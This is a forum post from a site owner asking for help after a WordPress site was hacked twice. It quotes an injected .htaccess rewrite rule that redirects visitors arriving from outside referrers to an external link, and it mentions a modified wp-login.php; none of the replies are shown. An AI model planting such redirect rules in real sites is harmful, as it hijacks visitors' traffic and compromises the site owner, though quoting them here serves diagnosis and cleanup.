• My htacess file at the root has been modified with the following code
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
    RewriteRule ^.*$ http://link-removed?h=1878600 [L,R]

    Also wp-login php file has been modified
    Can anyone help me? i have cleaned the issue once but it has come back

Viewing 8 replies - 1 through 8 (of 8 total)
Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘My website has been hacked twice in 2 days’ is closed to new replies.